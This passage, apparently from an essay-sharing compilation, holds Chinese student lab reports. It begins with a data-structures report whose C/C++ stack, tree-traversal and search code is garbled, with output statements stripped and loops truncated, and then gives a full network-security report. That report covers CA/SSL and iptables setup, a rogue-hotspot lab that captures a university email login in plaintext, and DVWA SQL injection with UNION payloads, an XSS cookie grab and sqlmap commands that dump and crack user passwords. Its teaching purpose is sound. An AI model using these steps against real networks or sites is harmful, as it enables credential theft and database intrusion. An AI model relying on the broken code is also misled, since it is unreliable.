case 2:printf(\"\\t以\'0\'结束\\n\");printf(\"\\t\");scanf(\"%d\",&x);

while(x){

EnQueueb(Sv,x);scanf(\"%d\",&x);}

printf(\"\\t链式存储栈的入栈操作完成!\\n\");break;

case 3: DeQueueb(Sv);break;}}break; } } 程序调试截图:

1.采用链式存储实现栈的初始化、入栈、出栈操作

2.采用顺序存储实现栈的初始化、入栈、出栈操作

3.采用链式存储实现队列的初始化、入队、出队操作

4.采用顺序存储实现队列的初始化、入队、出队操作

七、心得体会

实践才能出真知,在通过了上机操作后,才发现了许多在平时上理论课的时候没有想到的方方面面,编写程序时发现很多语法的错误,以及很多英语单词的记不熟,记错,程序函数错用等等,我想需要在以后多多练习,才能逐步解决这些问题。 实验三 二叉树的建立和遍历

一、目的和要求

1、了解二叉树的建立的方法及其遍历的顺序,熟悉二叉树的三种遍历

2、检验输入的数据是否可以构成一颗二叉树

二、实验内容

1.二叉树的建立和遍历

三、仪器、设备和材料

1.适合实验要求的计算机系统 。 2.VC++编程平台。

四、实验的描述和算法

1、实验描述

二叉树的建立首先要建立一个二叉链表的结构体,包含根节点和左右子树。因为耳熟的每一个左右子树又是一颗二叉树,所以可以用递归的方法来建立其左右子树。二叉树的遍历是一种把二叉树的每一个节点访问完并输出的过程,遍历时根结点与左右孩子的输出顺序构成了不同的遍历方法,这个过程需要按照不同的遍历的方法,先输出根结点还是先输出左右孩子,可以用选择语句实现。

2、算法

#include #include using namespace std; template struct BinTreeNode

//二叉树结点类定义 { T data;

//数据域

BinTreeNode *leftChild,*rightChild;

//左子女、右子女域

BinTreeNode(T x=T(),BinTreeNode* l =NULL,BinTreeNode* r = NULL )

:data(x),leftChild(l),rightChild(r){}

//可选择参数的默认构造函数 }; //----------- template void PreOrder_2(BinTreeNode *p)

//非递归前序遍历 { stack * >S; while(p!=NULL || !S.empty()) {

while(p!=NULL)

{

coutdata;

//访问根结点

S.push(p);

p=p->leftChild;

//遍历指针进到左子女结点

}

if(!S.empty())

//栈不空时退栈

{

p=S.top();

S.pop();

p = p->rightChild;

//遍历指针进到右子女结点

} } } //-- template void InOrder_2(BinTreeNode *p)

//非递归中序遍历 { stack* >S; do {

while(p!=NULL)

//遍历指针未到最左下的结点,不空

{

S.push(p);

p=p->leftChild;

}

if(!S.empty())

//栈不空时退栈

{

p=S.top();

S.pop();

coutdata;

p=p->rightChild;

} } while(p !=NULL || !S.empty()); }

//---- template void PostOrder_2(BinTreeNode *p) //非递归后序遍历 { stack * >S; stack tag;//定义一个新的栈用来保存tag域判别根结点的左右子树是否均遍历过

while(p != NULL || !S.empty())

//左子树经过结点加L进栈

{

while(p!=NULL)

{

S.push(p); //首先将t和tag为入栈,遍历左子树

tag.push(0);//遍历左子树前的现场保护

p=p->leftChild;

}

while( !S.empty() && tag.top()==1)

{

p=S.top();

S.pop();

tag.pop();

coutdata; //最后访问根结点。

}

if( !S.empty())

{

tag.pop();

tag.push(1);//遍历右子树前的现场保护,修改栈顶tag为,遍历右子树

p=S.top();

// 取栈顶保存的指针

p=p->rightChild;

}

else

break;

} } template void InOrder_1(BinTreeNode * subTree) {//递归函数:中序次序遍历以subTree为根的子树。

if(subTree !=NULL)

//NULL是递归终止条件

{

InOrder_1(subTree->leftChild); //中序遍历根的左子树

coutdata;

//访问根结点

InOrder_1(subTree->rightChild); //中序遍历根的右子树

} } template void PreOrder_1(BinTreeNode * subTree) {//递归函数:前序遍历以subTree为根的二叉树。 if(subTree !=NULL)

//递归结束条件

{

coutdata;//访问根结点

PreOrder_1(subTree->leftChild);

//前序遍历根的左子树

PreOrder_1(subTree->rightChild);

//前序遍历根的右子树

} } template void PostOrder_1(BinTreeNode * subTree) {//递归函数:后序次序遍历以subTree为根的子树。

if(subTree !=NULL)

//NULL是递归终止条件

{

PostOrder_1(subTree->leftChild); //后序遍历根的左子树

PostOrder_1(subTree->rightChild); //后序遍历根的右子树

coutdata;

//访问根结点

} } //------------ template void CreateBinTree(BinTreeNode * & subTree) {//递归方式建立二叉树

T item;

cin>>item;

if(item !=-1)

{

subTree = new BinTreeNode();

if(subTree == NULL)

{

cerr

exit(1);

}

subTree->data = item;

CreateBinTree(subTree->leftChild); //递归建立左子树

CreateBinTree(subTree->rightChild); //递归建立右子树

}

else subTree = NULL;

//封闭指向空子树的指针 } int main() {

BinTreeNode * Tree = NULL; cout

cout

PreOrder_1(Tree);

cout

cout

PostOrder_1(Tree); cout

cout

3、实验程序运行截图

实验四 散列法查找和排序

一、目的和要求

1.用散列法实现顺序查找,折半查找

二、仪器、设备和材料

1.适合实验要求的计算机系统 。 2.VC++编程平台。

三、实验步骤 和程序

1、顺序查找 #include #include #include #define m

100 #define NULLKEY 0 typedef int KeyType;

/* 假设关键字为整型 */ typedef struct { KeyType key; }RecordType; typedef RecordType HashTable[m]; int hash(KeyType k)/*除留余数法构造哈希函数*/ { int h; h = k%m; return h; } int HashSearch( HashTable ht, KeyType K)/*哈希查找*/ { int h0; int i; int hi; h0=hash(K); if (ht[h0].key==NULLKEY)

return (-1); else

if (ht[h0].key==K)

return (h0);

else

/* 用线性探测再散列解决冲突 */

{

for (i=1; i

{

hi=(h0+i) % m;

if (ht[hi].key==NULLKEY)

return (-1);

else

if (ht[hi].key==K)

return (hi);

}

return (-1);

}

} void main() { int i,j; int n; int p; int hj; int k; int result; HashTable ht; for(i=0; i

ht[i].key = NULLKEY; printf(\"请输入哈希表的元素个数:\"); scanf(\"%d\",&n); for(i=1; i

printf(\"请输入第%d个元素:\",i);

fflush(stdin);

scanf(\"%d\",&p);

j = hash(p);

if (ht[j].key == NULLKEY)

ht[j].key = p;

else

{

for (i=1; i

{

hj=(j+i) % m;

if (ht[hj].key==NULLKEY)

{

ht[j].key = p;

}

i = m;

}

}

} } printf(\"请输入要查找的元素:\"); fflush(stdin); scanf(\"%d\",&k); result = HashSearch(ht,k); if(result == -1) printf(\"未找到!\\n\"); else printf(\"元素位置为%d\\n\",result); system(\"pause\"); 运行结果如下:

2、折半查找

#include #define N 21 void main(void) { int a[N]; int i,n,num; int top,bottom,mid; int flag=1; int loc=-1; printf(\"你想在多少个数中进行折半查找,请输入(1--20):\"); scanf(\"%d\",&n); while(n20) {

printf(\"你输入的数不正确,请重新输入:\\n\");

printf(\"你想在多少个数中进行折半查找,请输入(1--20):\");

scanf(\"%d\",&n); } printf(\"请你输入一个整数a[1]:\"); scanf(\"%d\",&a[1]); i=2; while(i

printf(\"请你输入一个整数a[%d]:\",i);

scanf(\"%d\",&a[i]);

i++; } printf(\"\\n输出表列\\n\"); for(i=1;i

bottom=%d,

mid=%d,a[i]=%d\\n\",top,bottom,mid,mid,a[mid]); if((num>a[top])||(num

loc=-1;

flag=0; } else if(a[mid]==num) {

loc=mid;

printf(\"找到数

%6d的位置%2d\\n\",num,loc);

break; } else if(a[mid]>num) {

top=mid-1;

mid=(top+bottom)/2; } else if(a[mid]

bottom=mid+1;

mid=(top+bottom)/2; } } if(loc==-1) { printf(\"%d这个数在表列中没有找到。\\n\",num); } } 运行结果如下:

推荐第4篇:中南大学 网络安全实验报告

CENTRAL SOUTH UNIVERSITY

网 络 安 全 实 验 报 告

学生姓名

专业班级

学 号

学 院 信息科学与工程学院 指导教师 刘嫔

实验时间 2014年12月 实验一 CA证书与SSL连接

应用场景

在访问Web 站点时,如果没有较强的安全措施,用户访问的数据是可以使用网络工具 捕获并分析出来的。在Web 站点的身份验证中,有一种基本身份验证,要求用户访问输入 用户名和密码时,是以明文形式发送密码的,蓄意破坏安全性的人可以使用协议分析程序破 译出用户名和密码。那我们该如果避免呢?可利用SSL 通信协议,在Web 服务器上启用安 全通道以实现高安全性。

SSL 协议位于TCP/IP 协议与各种应用层协议之间,为数据通讯提供安全支持。SSL 协 议可分为两层: SSL 记录协议(SSL Record Protocol):它建立在可靠的传输协议(如TCP) 之上,为高层协议提供数据封装、压缩、加密等基本功能的支持。SSL 握手协议(SSL Handshake Protocol):它建立在SSL 记录协议之上,用于在实际的数据传输开始前,通讯双 方进行身份认证、协商加密算法、交换加密密钥等。每一个Windows Server 2003 证书颁发 机构都有可供用户和管理员使用的网页。

实验目标

掌握在Windows Server 2003 下独立根CA 的安装和使用。 使用WEB 方式申请证书和安装证书。 建立SSL 网站。

分析SSL 网站的数据包特点。

实验拓扑

VM Client

VM Server

实验环境

虚拟机:Windows Server 2003,Windows XP,Wireshark 抓包软件。

实验过程指导

任务一:windows server 2003 环境下独立根CA 的安装及使用

1、启动Windows Server 2003 和Windows XP,配置其IP,使其在同一局域网网段。

2、在Windows Server 2003 中,选择【开始】|【控制面板】|【添加和删除程序】,在弹出窗

口中选择【添加和删除windows 组件】,在【组件】列表框中选择【证书服务】,再单击【下 一步】按钮,如下图所示。

3、在弹出的窗口中选择【独立根CA】单选按钮,单击【下一步】按钮,在弹出窗口中按 要求依次填入CA 所要求的信息,单击【下一步】按钮,如下图所示。

4、继续选择【证书数据库】、【数据库日志】和配置信息的安装、存放路径,如下图所示。

单击【下一步】按钮。安装的时候,可能会弹出如下窗口,为了实验方便,已经把I386 文 件夹复制到C:\\下,选择【浏览】,选择文件夹“C:\\I386”,点【确定】,完成安装。

5、选择【开始】|【程序】|【管理工具】,可以找到【证书颁发机构】,说明CA 的安装已经

完成,如下图所示。

6、从同一局域网中的另外一台XP 开启IE 浏览器,输入http://windows2003 的IP/certsrv/, 选中【申请一个证书】,如下图所示,在弹出的页面中选择【web 浏览器证书】。

7、在弹出窗口中填写用户的身份信息,完成后进行【提交】。此种情况下,IE 浏览器采用 默认的加密算法生成公钥对,私钥保存在本地计算机中,公钥和用户身份信息按照标准的格式发给CA 服务器,如图所示,单击【是】,进入下一步。CA 服务器响应后,弹出证书申请 成功页面,如下图所示。

8、在根CA 所在的计算机上,选择【开始】|【程序】|【管理工具】|【证书颁发机构】,上

面申请的证书便会出现在窗口右边,选择证书单击右键,选择【所有任务】|【颁发】,进行 证书颁发,如下图所示。证书颁发后将从【挂起的申请】文件夹转入【颁发的证书】文件夹 中,表示证书颁发完成。

9、在申请证书的计算机上打开IE,输入http://windows2003 的IP/certsrv/,进入证书申请页

5 面,选择【查看挂起的证书申请状态】,弹出的页面中选择一个已经提交的证书申请,如下 图所示。选择安装此证书。

10、现在验证此CA 系统颁发的新证书是否可信,为此需要安装CA 系统的根证书,进入证书申请主页面,选择当前的CA 证书进行下载,并保存到合适路径,如下图所示。

11、下载完毕之后,在证书的保存目录中查看证书信息,单击【安装证书】按钮,进入证书 导入向导,按照默认的配置完成证书的导入,导入成功后,单击【确定】按钮,之后完成。

7 任务二:基于Web 的SSL 连接设置

1、在XP 中,左下角【开始】,打开【Wireshark】,并点击开始抓包的按钮。打开IE 浏览器,输入网址http://windows2003 的IP/?id=1(比如:http://192.168.1.130/?id=1),然后保存Wireshark的抓包结果1。

2、选择【开始】|【程序】|【管理工具】|【IIS(Internet 信息服务)管理器】,在弹出窗口

右键单击【默认网站】,弹出的快捷菜单中选择【属性】选项,如下图所示。

3、在弹出窗口内选择【目录安全性】标签,单击【安全通信】中的【服务器证书】按钮, 如下图所示。

4、弹出【IIS 证书向导】窗口,选中【新建证书】复选项,一直单击【下一步】按钮,输入自定义的名称,如下图所示。填写相应的信息后,单击【下一步】按钮。

5、弹出【请求文件摘要】窗口,确认后单击【下一步】按钮,接着单击【完成】按钮,完 成服务器端证书配置,如下图所示。

6、打开IE 浏览器(windows2003 中的),进入证书申请主界面,如下图所示。

7、在出现的网页中选择【高级证书申请】,如图所示,在出现的网页中单击第二个选项【base64 编码】。打开刚才IIS 证书向导生成的请求文件,(默认路径C:\\certreq.txt),复制并粘贴文件

内容到第一个文本框,如下图所示,单击【提交】按钮,转到完成提交后的页面。

8、回到首页,选择【查看挂起的证书申请状态】,弹出的页面中选择一个已经提交的证书申 请,如下图所示。选择【Base 64 编码】,点击【下载证书】,【保存】certnew.cer 文件到桌面。

9、选择【开始】|【程序】|【管理工具】|【IIS(Internet 信息服务)管理器】,在弹出窗口

右键单击【默认网站】,弹出的快捷菜单中选择【属性】选项,在弹出窗口内选择【目录安 全性】标签,选择【服务器证书】,选择【下一步】,【处理挂起的请求并安装证书】选择【下 一步】,【浏览】选择刚才保存的certnew.cer 文件,如下图所示。【下一步】【下一步】【完成】。

10、还是在【目录安全性】下,选择【安全通信】下的【编辑】,在下如图所示的弹出窗口 中选中【要求安全通道(SSL)】复选项,并在【客户端证书】栏中选中【接受客户端证书】 复选项,再单击【确定】按钮。返回【目录安全性】面板,单击【应用】按钮及【确定】按

12 钮,完成配置。

11、在XP 系统打开浏览器,输入服务器IP 地址,进入证书申请主页面,此时会显示错误 信息页面,要求采用https 的方式连接服务器,如图所示。

12、把http 改成https 继续访问,此时浏览器提示你要安装证书,安装完证书后,就可以正 常使用了。

13、再次打开Wireshark , 并点击开始抓包的按钮。打开IE 浏览器, 输入网址

https://windows2003 的IP/?id=1(比如:https://192.168.1.130/?id=1),然后保存Wireshark 的抓

13 包结果2。

14、分析比较抓包结果1 和抓包结果2 中,对IP/?id=1 请求处理的差异。

实验截图

1、写出windows server 2003 下独立根CA 的配置及应用的过程,将重要的步骤截图并保存。 如上所示,重要的步骤截图已置于相应步骤下。

2、写出windows server 2003 下基于Web的SSL连接设置的过程,将重要的步骤截图并保存。 如上所示,重要的步骤截图已置于相应步骤下。

实验心得

通过此次实验,我学会了Wireshark抓包的基本使用方法,学到了很多课本上没有的新知识,并对课本上的概念有了实际的更深的认识。通过Wireshark所抓到的未使用SSL 连接和使用SSL 连接的信息的对比,我对HTTPS有了一定的了解,对计算机网络通信中的数据传输安全有了大概的认识。

HTTPS(全称:Hyper Text Transfer Protocol over Secure Socket Layer),是以安全为目标的HTTP通道,简单讲是HTTP的安全版。即HTTP下加入SSL层,HTTPS的安全基础是SSL,因此加密的详细内容就需要SSL。它是一个URI scheme(抽象标识符体系),句法类同http:体系。用于安全的HTTP数据传输。https:URL表明它使用了HTTP,但HTTPS存在不同于HTTP的默 14 认端口及一个加密/身份验证层(在HTTP与TCP之间)。这个系统的最初研发由网景公司(Netscape)进行,并内置于其浏览器Netscape Navigator中,提供了身份验证与加密通讯方法。现在它被广泛用于万维网上安全敏感的通讯,例如交易支付方面。它的主要作用可以分为两种:一种是建立一个信息安全通道,来保证数据传输的安全;另一种就是确认网站的真实性,凡是使用了 https 的网站,都可以通过点击浏览器地址栏的锁头标志来查看网站认证之后的真实信息,也可以通过 CA 机构颁发的安全签章来查询。

Wireshark所抓到的未使用SSL 连接的http 信息,信息是明文传输,而使用SSL连接的https 则具有安全性的l加密传输协议,更加安全。

15 实验二 配置和管理主机防火墙

应用场景

对于Internet 上的系统,不管是什么情况,首先我们要明确一点:网络是不安全的。因此,虽然创建一个防火墙并不能保证系统100%安全,但却是绝对必要的。和社会上其它任何事物一样,Internet 经常会受到一些无聊的或者别有用心的人的干扰,防火墙的目的就是将这类人挡在你的网络之外,同时使你仍然可以完成自己的工作。

那么构筑怎样的Linux 防火墙系统才算是足够安全呢?这是一个很难回答的问题,因为不同的应用环境对安全的要求不一样。用一句比较恰当而且简单的话来回答这个问题:用户了解自己的Linux 系统和设置,并且可以很好地保护好自己的数据和机密文件的安全,这对于该计算机用户来说就可以称之为他的计算机有足够的安全性。

那么到底什么是防火墙呢?防火墙是一个或一组系统,它在网络之间执行访问控制策略。实现防火墙的实际方式各不相同,但是在原则上,防火墙可以被认为是这样一对机制:一种机制是拦阻传输流通行,另一种机制是允许传输流通过。一些防火墙偏重拦阻传输流的通行,而另一些防火墙则偏重允许传输流通过。了解有关防火墙的最重要的概念可能就是它实现了一种访问控制策略。

一般来说,防火墙在配置上是防止来自“外部”世界未经授权的交互式登录的。这大大有助于防止破坏者登录到你网络中的计算机上。一些设计更为精巧的防火墙可以防止来自外部的传输流进入内部,但又允许内部的用户可以自由地与外部通信。如果你切断防火墙的话,它可以保护你免受网络上任何类型的攻击。防火墙的另一个非常重要的特性是可以提供一个单独的“拦阻点”,在“拦阻点”上设置安全和审计检查。与计算机系统正受到某些人利用调制解调器拨入攻击的情况不同,防火墙可以发挥一种有效的“电话监听”和跟踪工具的作用。防火墙提供了一种重要的记录和审计功能;它们经常可以向管理员提供一些情况概要,提供有关通过防火墙的传输流的类型和数量,以及有多少次试图闯入防火墙的企图等信息。

因此本实验将介绍如何配置linux 防火墙。

VM Client

VM Server

实验目标

1.掌握linux 下基本的iptables 知识 2.学会配置iptables VM Windows VM Linux

实验环境

虚拟机:linux,windowsXP;linux 主机用户名:root;密码:root 16 实验过程指导

一.Iptables 的规则表、链结构

1.规则表(iptables管理4个不同的规则表,其功能由独立的内核模块实现) filter 表:包含三个链INPUT OUTPUT FORWARD nat表:PREROUTING POSTROTING OUTPUT mangle 表:PREROUTING POSTROUTING INPUT OUTPUT FORWARD raw 表:OUTPUT PREROUTING 2.规则链

INPUT 链当收到访问防火墙本机的数据包(入站)时,应用此链中的规则 OUTPUT链当防火墙本机向外发送数据包(出站)时,应用此链中的规则 FORWARD链收到需要通过防火墙发送给其他地址的数据包,应用此链 PREROUTING链做路由选择之前,应用此链

POSTROUTING链对数据包做路由选择之后,应用此链中的规则

二.数据包的匹配流程

1.规则表之间的优先级 raw mangle nat filter 2.规则链之间的优先级

入站数据流向:来自外界的数据包到达防火墙,首先PREROUTING规则链处理(是否被修改地址),之后会进行路由选择(判断该数据包应该发往何处),如果数据包的目标地址是防火墙本机,那么内核将其传递给INPUT 链进行处理,通过以后再交给上次的应用程序进行响应。

转发数据流向:来自外界的数据包到达防火墙后,首先被PREROUTING 规则链处理,之后进行路由选择,如果数据包的目标地址是其他外部地址,则内核将其传递给FPRWARD 链进行处理,然后再交给POSTROUTIING 规则链(是否修改数据包的地址等)进行处理。

出站数据流向:防火墙本身向外部地址发送数据包,首先被OUTPUT 规则链处理,之后进行路由选择,然后交给POSTROUTING 规则链(是否修改数据包的地址等)进行处理。 3.规则链内部各防火墙规则之间的优先顺序

依次按第1条规则、第2条规则、第3条规则„„的顺序进行处理,找到一条能够匹配的数据包规则,则不再继续检查后面的规则(使用LOG记录日志的规则例外)。如果找不到匹配规则,就按照规则链的默认策略进行处理。

三.管理和设置iptables规则

Iptables 的基本语法格式选项名 -A -D -I -R

功能及特点

在指定链的末尾添加(--append)一条新规则

删除(--delete)指定链中的某一条规则,按规则序号或内容确定要删除的规则 在指定链中插入一条新规则,若未指定插入位置,则默认在链的开头插入 修改、替换指定链中的一条规则,按按 17 -L -F -X -P -n -v -V -h --line-numbers -N

1.查看规则表

# iptables -L INPUT --line-numbers //查看filter表中INPUT链中的所有规则,同时显示各条规则的顺序号

规则序号或内容确定要替换的规则 列出指定链中所有的规则进行查看,若未指定链名,则列出表中所有链的内容 清空指定链中的所有规则,若未指定链名,则清空表中所有链的内容 删除表中用户自定义的规则链 设置指定链的默认策略(大p)

使用数字形式显示输出结果,如显示主机的IP地址而不是主机名

查看规则列表时显示详细的信息 查看iptables命令工具的版本信息 查看命令帮助信息

查看规则列表时,同时显示规则在链中的顺序号

新建一条用户自定义的规则链

2.删除、清空规则

# iptables -F //不指定表名时,默认情况filter表

3.设置规则链的默认策略

# iptables -t filter -P FORWARD DROP //将filter表中FORWARD规则的默认策略设为DROP # iptables -P OUTPUT ACCEPT //将filter表中OUTPUT规则的默认策略设为ACCEPT 18

四.条件匹配

1.通用(general)条件匹配(直接使用,而不依赖于其他的条件匹配及其扩展) 协议匹配(允许使用的协议名包含在/etc/protocols文件中)

# iptables -AINPUT -p icmp–j REJECT //拒绝进入防火墙的所有icmp数据包

地址匹配

拒绝转发来自192.168.1.11主机的数据,允许转发来自192.168.0./24网段的数据 # iptables -A FORWARD -s 192.168.1.11 -j REJECT

2.隐含(implicit)条件匹配(需要指定的协议匹配为前提,其对应的功能由iptables自动(隐含)的装载入内核),如果无匹配条件,默认为REJECT。

19 端口匹配

仅允许系统管理员从202.13.0.0/16网段使用SSH方式远程登录防火墙主机 # iptables -A INPUT -p tcp --dport 22 -s 202.13.0.0/16 -j ACCEPT

五.在进行了上述规则讲解与熟悉之后,接下来的步骤进行防火墙规则配置与测试

禁止Windows主机ping防火墙linux主机,但是允许从防火墙上ping其他主机(允许接受ICMP回应数据)

1.配置linux防火墙主机ip地址,如下图所示:

2.配置windows 主机ip地址,如下图所示:

3.配置linux 主机防火墙规则,如下图所示:

4.在此在windows 主机和linux 主机上进行相互ping 测试,测试结果如下图所示:

21

windows主机无法ping通linux防火墙主机,但是linux主机可以ping通windows主机。

实验截图

如上所示,重要的步骤截图已置于相应步骤下。

实验心得

1) 如何在linux 主机上配置防火墙规则以防止DDOS 高级?

答:默认的iptables规则是无法过滤DDOS攻击数据的,我们需要添加过滤规则实现iptables拥有抗DDOS的能力:

屏蔽 SYN_RECV 的连接

-A FORWARD -p tcp -m tcp --tcp-flags FIN,SYN,RST,ACK SYN -m limit --limit 1/sec -j ACCEPT 限制IP碎片,每秒钟只允许100个碎片,用来防止DoS攻击 -A FORWARD -f -m limit --limit 100/sec --limit-burst 100 -j ACCEPT 限制ping包每秒一个,10个后重新开始

-A FORWARD -p icmp -m limit --limit 1/sec --limit-burst 10 -j ACCEPT 限制ICMP包回应请求每秒一个

-A FORWARD -p icmp -m icmp --icmp-type 8 -m limit --limit 1/sec -j ACCEPT 此处自定义一个表

-A FORWARD -j RH-Firewall-1-INPUT 完全接受 loopback interface 的封包 -A RH-Firewall-1-INPUT -i lo -j ACCEPT 允许主机接受 ping -A RH-Firewall-1-INPUT -p icmp -m icmp --icmp-type any -j ACCEPT 允许连线出去后对方主机回应进来的封包

22 -A RH-Firewall-1-INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT 允许防火墙开启指定端口

-A RH-Firewall-1-INPUT -p tcp -m state --state NEW -m tcp --dport port -j ACCEPT 限制SSH登陆

只允许在***.***.***.***上使用h远程登录,从其它计算机上禁止使用h iptables -A INPUT -s ***.***.***.*** -p tcp --dport 22 -j ACCEPT iptables -A INPUT -p tcp --dport 22 -j DROP

2) linux 主机防火墙处理数据包的顺序是什么?

答:(1)当包到达端口时,对包报头进行语法分析。大多数包过滤设备只检查IP、TCP、或UDP报头中的字段。

(2)若一条规则阻止包传输或接收,则此包便不被允许。

(3)若一条规则允许包传输或接收,则此包便可以被继续处理。 (4)若包不满足任何一条规则,则此包便被阻塞。

23

实验三WIFI 钓鱼

步骤一 共享WIFI 工具:电脑、WIN7 系统、无线网卡

步骤

1.开始菜单-->命令提示符(cmd)-->右键,以管理员身份运行 2.运行以下命令启用虚拟网卡

>netsh wlan set hostednetwork mode=allow id=(这里写无线网名字) key=(这里是密码)

3.网络共享中心-->更改高级适配器设置-->右键已连接到Internet 的网络连接-->属性-->切换 到“共享”选项卡,选中其中的复选框,并选择允许其共享Internet 的网络连接,这里即我 们的虚拟WIFI 网卡

4.开启无线网络,继续在命令提示符中运行以下命令: >netsh wlan start hostednetwork 24 即可开启我们之前设置好的无线网络(相当于打开路由器的无线功能)

步骤二 WIFI 钓鱼

工具:其他笔记本或手机、Wareshark 步骤

1.搜索到刚刚设置的WIFI,连接上(密码为刚刚设置的key:12345679)

2.在笔记本上打开wareshark,选择capture-->interfaces

25 3.选择Packets 最多的项,点击start 按钮

4.在手机或笔记本上打开中南大学邮箱网站:http://mail.csu.edu.cn/,在主机上用wareshark 捕捉

http 的包

(这里大家可以自由实验,能监控到连接到该WIFI 的机器的所有包的情况) 5.在手机或笔记本上输入用户名和密码,点击登录

26

6.在主机上用wareshark 捕捉到刚刚post 提交的http 包,右键选择Follow tcp stream

7.可以看到刚刚提交的用户名和密码,且是未经过加密的

27

实验截图

如上所示,重要的步骤截图已置于相应步骤下。

实验心得

本次实验是在自己的笔记本上做的,实验也比较简单,所以做得比较快效果比较好。通过本次实验,大致了解了WIFI钓鱼的操作过程,同时,也让自己有了警觉之心,要养成良好的WIFI使用习惯。手机会把使用过的WIFI热点都记录下来,如果WiFi开关处于打开状态,手机就会不断向周边进行搜寻,一旦遇到同名的热点就会自动进行连接,存在被钓鱼风险。因此当我们进入公共区域后,尽量不要打开WIFI开关,或者把WiFi调成锁屏后不再自动连接,避免在自己不知道的情况下连接上恶意WIFI。

28

实验四 SQL注入攻击

【实验目的】

SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所致;后者主要是由于程序员对输入未进行细致地过滤,从而执行了非法的数据查询。

本次实验目的是了解sql注入的常见手段,要到两个工具:

①dvwa(Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。

② sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。

【实验组网拓扑】

VM Client

VM Server

【实验一:dvwa手动sql注入】

1、连接好虚拟机拓扑图,配置WindowsXP Client和Windows XP Server的IP使其在同一个局域网网段。

2、打开Server端的xampp,启动apache和mysql。打开Client的浏览器,访问Server的IP/dvwa,如“192.168.1.32/dvwa”,登陆账户为admin,密码为paword。

29

3、选择SQLInjection,点击右下角的ViewSource,查看PHP源代码。

30

4、正常测试,输入“1”,得到正常结果,如下所示。

5、当将输入变为“\'”时,页面提示错误“YouhaveanerrorinyourSQLsyntax;checkthemanualthatcorrespondstoyourMySQLserverversionfortherightsyntaxtousenear\'\'\'\'\'atline1”,结果如图。看到这个结果,可以知道,这个表单存在着注入漏洞。

6、尝试输入:“1’or 1=1–”注意“--”后面有空格!此时成功进行sql注入。

31

7、测试查询信息列数。利用语句order by num。这里输入\" 1\'order by 1 --\" 结果页面正常显示,注意--后面有空格。继续测试,\" 1\'order by 2 --\",\" 1\'order by 3 --\",当输入3是,页面报错。页面错误信息如下,Unknown column \'3\' in \'order clause\',由此查询结果值为2列。

8、尝试注入“1\' and 1=2 union select 1,2 --”,从而得出First name处显示结果为查询结果第一列的值,surname处显示结果为查询结果第二列的值,利用内置函数user(),及database(),version()注入得出连接数据库用户以及数据库名称:“1\' and 1=2 union select user(),database() --”。

32

9、选择DVWA Security,将安全级别分别设置为中、高。再运行上面的实验sql语句,结合右下角的ViewSource,分析三种等级的代码和sql注入效果有何区别。在安全级别分别设置为低时,结合PHP源代码,考虑不采用“--”的情形下,完成sql注入,写出sql注入语句。

【实验二:sqlmap测试dvwa】

1、打开Server端的xampp,启动apache和mysql。打开Client的浏览器,访问Server的IP/dvwa,如“169.254.180.158/dvwa”,登陆账户为admin,密码为paword。选择DVWA Security,将安全级别分别设置为低。

2、选择XSS reflected,输入“alert(document.cookie)”,获取登陆系统后的cookie值,截图保存cookie值。

3、使用sqlmap查找注入点,打开Client端的控制台窗口,转到目录“C:\\Python27\\sqlmap”,输入以下命令,注意!“169.254.180.158”表示Server的IP,“security=low;PHPSESSID=mkoc8iuc07hfre7vvo0e5ghjv5”表示上一步所获得的cookie值,请同学们按照实际环境 33 填写相应的值!“sqlmap.py -u \"http://169.254.180.158/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit\" --cookie=\"security=low; PHPSESSID=mkoc8iuc07hfre7vvo0e5ghjv5\"”。

依据以下信息,得到可能的注入点是id,数据库是mysql。

[INFO] heuristic (basic) test shows that GET parameter \'id\' might be injectable (poible DBMS: \'MySQL\') [INFO] GET parameter \'id\' is \'MySQL UNION query (NULL) -1 to 20 columns\' injectable

4、输入“sqlmap.py -u \"http://169.254.180.158/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit\" --cookie=\"security=low; PHPSESSID=mkoc8iuc07hfre7vvo0e5ghjv5\" --current-db”得到当前数据库名。

current database: \'dvwa\'

5、输入“sqlmap.py -u \"http://169.254.180.158/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit\" --cookie=\"security=low; PHPSESSID=mkoc8iuc07hfre7vvo0e5ghjv5\" --current-db --tables -Ddvwa”得到数据库所有表。

6、输入“sqlmap.py -u \"http://169.254.180.158/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit\" --cookie=\"security=low; PHPSESSID=mkoc8iuc07hfre7vvo0e5ghjv5\" -T users --columns”得到user表的所有列。

34

7、输入“sqlmap.py -u \"http://169.254.180.158/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit\" --cookie=\"security=low; PHPSESSID=mkoc8iuc07hfre7vvo0e5ghjv5\" -T users --dump”得到user表的所有列,在sqlmap询问时候破解密码时,选择是,sqlmap会使用自己的字典来破解密码,得到5个用户的密码。此时就完成了利用sqlmap进行“拖库”的基本步骤。

实验截图

如上所示,重要的步骤截图已置于相应步骤下。

实验心得

随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。

此次的实验让我了解了SQL注入攻击的原理和过程,让我了解到了做这方面开发的时候需要注意的安全性问题,也意识到安全的重要性和数据库的一些欠缺,提高了自己在这方面的安全意识。在实验的过程中遇到了很多困难,配置上的,环境上的,还有一些需要注意的小问题。很高兴顺利完成了这次实验,期待下次能使用更高级的工具进行扫描和实施攻击,当然,以后的开发过程中也要特别注意这些脆弱点了。

35

推荐第5篇:大学认识实习实验报告

**大学**学院认识实习日志

姓名:专业: 学号:

注:根据实习内容进行如实记载。

**大学**学院认识实习实验报告

一、实习目的、要求:

